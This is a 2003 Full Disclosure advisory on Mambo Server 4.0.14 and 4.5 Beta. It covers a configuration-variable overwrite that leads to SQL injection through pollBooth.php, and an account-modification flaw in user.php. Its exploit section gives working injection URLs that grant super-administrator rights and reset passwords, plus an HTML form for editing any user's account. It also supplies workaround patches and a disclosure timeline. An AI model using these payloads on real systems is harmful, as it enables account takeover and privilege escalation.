Full Disclosure mailing list archives
[SCSA-023] Multiple vulnerabilities in Mambo Server
From: "Security Corporation Security Advisory" <advisory () security-corporation com>
Date: Wed, 10 Dec 2003 20:44:28 GMT
======================================================================Security Corporation Security Advisory [SCSA-023]
Multiple vulnerabilities in Mambo Server======================================================================
PROGRAM: Mambo Server HOMEPAGE: http://www.mamboserver.com VULNERABLE VERSIONS: 4.0.14 and 4.5 Beta 1.0.3 RISK: Low/MEDIUM IMPACT: Redefining of configuration variablesChange of members's and administrator's informations RELEASE DATE: 2003-12-10
====================================================================== TABLE OF CONTENTS======================================================================
1..........................................................DESCRIPTION 2..............................................................DETAILS 3.............................................................EXPLOITS 4............................................................SOLUTIONS 5...........................................................WORKAROUND 6..................................................DISCLOSURE TIMELINE 7..............................................................CREDITS 8...........................................................DISCLAIMER 9...........................................................REFERENCES10............................................................FEEDBACK
1. DESCRIPTION======================================================================
"Mambo Open Source is the finest open source Web Content Management System available today. Mambo Open Source makes communicating viathe Web easy" (direct quote from Mambo Server website)
2. DETAILS======================================================================
Version 4.0.14 :
- Redefining of configuration variables :
A vulnerability has been discovered in the regglobals.php file thatallows unauthorized users to redefine configuration variables. Vulnerable code :
---------------------------------------------------- <?php if (!ini_get('register_globals')) { session_start(); $raw = phpversion(); list($v_Upper,$v_Major,$v_Minor) = explode(".",$raw); if(($v_Upper > 4 && $v_major < 1) || $v_Upper < 4){ $_FILES = $HTTP_POST_FILES; $_ENV = $HTTP_ENV_VARS; $_GET = $HTTP_GET_VARS; $_POST = $HTTP_POST_VARS; $_COOKIE = $HTTP_COOKIE_VARS; $_SERVER = $HTTP_SERVER_VARS; $_SESSION = $HTTP_SESSION_VARS; $_FILES = $HTTP_POST_FILES; } while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value; foreach($_FILES as $key => $value) { $GLOBALS[$key]=$_FILES[$key]['tmp_name']; foreach($value as $ext => $value2) { $key2 = $key."_".$ext; $GLOBALS[$key2]=$value2; } } } ?>----------------------------------------------------
We see at first that if register_globals=OFF, all the variables FILES, ENV, GET, POST, COOKIE, SERVER and SESSION will beredefined as global variables (GLOBAL). Only this code raises no problem of security.
But if the files : banners.php, pollBooth.php, upload.php,usermenu.php and userpage.php, we can see the following code :
------------------------------ include ("configuration.php"); [...] include ("regglobals.php");------------------------------ The configuration.php file contains variables as :
------------------------------------------------------------ $host = 'localhost'; // This is normally set to localhost $user = ''; // MySQL username $password = ''; // MySQL password $db = ''; // MySQL database name $dbprefix = 'mos_'; // Do not change unless you need to! ------------------------------------------------------------...
It is then possible to an attacker to give new values toall the variables of configurations. For example the pollBooth.php file :
---------------------------------------------------- include("configuration.php"); include('language/'.$lang.'/lang_poll.php'); include("regglobals.php"); [...] switch ($task){ case "Vote": addvote($voteID, $cook, $polls, $dbprefix); break; [...]}
function addvote($voteID, $cook, $pollID, $dbprefix){ if ($database==""){ require("classes/database.php"); $database = new database(); } global $sessioncookie; if (empty($sessioncookie)) { print "<SCRIPT>alert(\""._ALERT_ENABLED."\"); window.history.go(-1);</SCRIPT>\n"; } else { if($cook == "1") { print "<SCRIPT> alert(\""._ALREADY_VOTE."\"); window.history.go(-1);</SCRIPT>\n"; } else { if ($voteID == 0){ print "<SCRIPT>alert(\""._NO_SELECTION."\"); window.history.go(-1);</SCRIPT>\n"; } $cvalue = "1"; $cookiename="voted".$pollID; setcookie("$cookiename", $cvalue, time()+87640);}
if($cook == "") { if ($voteID > 0) { $query = "UPDATE ".$dbprefix."poll_data SET optionCount=optionCount + 1 WHERE pollid='$pollID' AND voteid='$voteID'"; $database->openConnectionNoReturn($query); $voters = $voters + 1; $query = "UPDATE ".$dbprefix."poll_desc SET voters=voters + 1 WHERE pollID='$pollID'";$database->openConnectionNoReturn($query);
$today = date("Y-m-d G:i:s"); $query = "INSERT INTO ".$dbprefix."poll_date SET date='$today', vote_id='$voteID', poll_id='$pollID'";$database->openConnectionNoReturn($query);
echo "<SCRIPT> alert(\""._THANKS."\"); window.history.go(-1);</SCRIPT>"; } } }}
[...]----------------------------------------------------
It is thus possible to execute any request UPDATE viathe pollBooth.php file if register_globals=OFF.
Version 4.5 Beta 1.0.3 :
- Change of members's and administrator's informations :
A vulnerability has been discovered in the components/com_user/user.php file that allows unauthorized users to change members's andadministrator's informations. Vulnerable code :
--------------------------------------------------- [...] switch( $task ) { [...] case "saveUserEdit": userSave( $option, $my->id ); break; [...] } [...] function userSave( $option, $uid) { global $database; if ($uid == 0) { echo _NOT_AUTH; return; }$row = new mosUser($database);
if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) { $row->load($_POST["id"]); $row->orig_password = $row->password; } if (!$row->bind( $_POST )) { echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n"; exit();}
if(isset($_POST["password"]) && $_POST["password"] != "") { if(isset($_POST["verifyPass"]) && ($_POST["verifyPass"] == $_POST["password"])) { $row->password = md5($_POST["password"]); } else { echo "<script> alert('Passwords do not match'); window.history.go(-1); </script>\n"; exit(); } } else { // Restore 'original password' $row->password = $row->orig_password; } if (!$row->check()) { echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n"; exit();} unset($row->orig_password); // prevent DB error!!
if (!$row->store()) { echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n"; exit();}
mosRedirect( "index.php?option=$option" ); } [...]----------------------------------------------------
It's possible for an attacker to modify many informations aboutan account via his ID like password, email, name etc...
3. EXPLOITs======================================================================
Version 4.0.14 :
- Redefining of configuration variables (if magic_quotes_gpc=OFF):
# The title of the article N°23 becomes "hop" : http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112)%20WHERE artid=23/*
# The user having id 52 becomes "super administrator" : http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117, 112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114)%20WHERE%20id=52/*
# The password of the user having id 10 becomes 'a' : http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97))%20WHERE%20id=10/*
Version 4.5 Beta 1.0.3 :
- Change of members's and administrator's informations :
Here is an example that permit to modify informationsabout an ID account :
--------------------exploit.html-------------------- <html> <head></head> <body> <form action="http://[target]/index.php" method="post"> New Name : <inputtype="text" name="name" value=""><br> New E-mail : <input type="text" name="email" value="" size="30"><br> New UserName : <input type="text" name="username" value=""><br> New Password : <input type="password" name="password" value=""><br> Verfiy New Pass : <input type="password" name="verifyPass"><br> ID : <input type="text" name="id" value="1"><br> <input type="hidden" name="option" value="com_user"> <input type="hidden" name="task" value="saveUserEdit"> <input type="submit" name="submit" value="Update"><br> </form> </body> </html>--------------------exploit.html--------------------
4. SOLUTIONS====================================================================== You can found patchs at the following link : http://www.phpsecure.info
The creator (Robert Castley) was notified, published a patch 2 for version 4.0.1 (works only if the patch 1 was installed) and a Beta1.0.14 version 4.5 was published for the vulnerabilities of 1.0.13.
5. WORKAROUND======================================================================
Version 4.0.14 :
In banners.php, pollBooth.php, upload.php, usermenu.php and userpage.php simply add the following line as FIRST LINE,and delete the other inclusions of this file :
--------------------------- include ("regglobals.php");---------------------------
Version 4.5 Beta 1.0.3 :
In the components/com_user/user.php file, in the userSave() function,replace the following lines :
---------------------------------------------------- if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) { $row->load($_POST["id"]); $row->orig_password = $row->password; }---------------------------------------------------- by
---------------------------------------------------- if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "") && $_POST["id"] == $uid) { $row->load($_POST["id"]); $row->orig_password = $row->password; }else{ die("Bad User Id"); }----------------------------------------------------
6. DISCLOSURE TIMELINE======================================================================
25/11/2003 Vulnerability discovered 25/11/2003 Vendor notified 25/11/2003 Vendor response 25/11/2003 Security Corporation clients notified 28/11/2003 Started e-mail discussions 09/12/2003 Last e-mail received10/12/2003 Public disclosure
7. CREDITS====================================================================== frog-m@n <frog-man () security-corporation com> is credited with this discovery Nicolas DE RYCKE <http://www.knowckers.org> is greeted.
8. DISLAIMER======================================================================
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any useof this information is at the user's own risk.
9. REFERENCES======================================================================
- Original Version:http://www.security-corporation.com/advisories-023.html
- Version Française:http://www.security-corporation.com/index.php?id=advisories&a=023-FR
10. FEEDBACK====================================================================== Please send suggestions, updates, and comments to:
Security Corporation http://www.security-corporation.comadvisory () security-corporation com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [SCSA-023] Multiple vulnerabilities in Mambo Server Security Corporation Security Advisory (Dec 10)